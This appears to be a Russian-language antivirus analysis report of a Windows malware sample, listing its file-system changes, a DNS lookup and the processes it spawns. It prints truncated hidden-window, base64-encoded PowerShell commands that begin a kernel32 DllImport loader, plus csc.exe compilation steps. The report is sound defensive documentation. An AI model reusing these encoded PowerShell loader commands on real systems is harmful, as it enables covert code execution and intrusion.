Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -window hidden -e JABDAEQAQQBVAFcAUAAgAD0AIAAnACQASgBqAEoAOQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGU...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\vxk__d77.0.cs
- %TEMP%\vxk__d77.cmdline
- %TEMP%\vxk__d77.out
- %TEMP%\csc9f89.tmp
- %TEMP%\res9f9a.tmp
- %TEMP%\vxk__d77.dll
Удаляет следующие файлы
- %TEMP%\res9f9a.tmp
- %TEMP%\csc9f89.tmp
- %TEMP%\vxk__d77.pdb
- %TEMP%\vxk__d77.cmdline
- %TEMP%\vxk__d77.out
- %TEMP%\vxk__d77.dll
- %TEMP%\vxk__d77.0.cs
Сетевая активность
UDP
- DNS ASK sk##e.pro
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -window hidden -e JABDAEQAQQBVAFcAUAAgAD0AIAAnACQASgBqAEoAOQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGU...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\vxk__d77.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9F9A.tmp" "%TEMP%\CSC9F89.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e JABKAGoASgA5ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAE...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\vxk__d77.cmdline"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9F9A.tmp" "%TEMP%\CSC9F89.tmp"
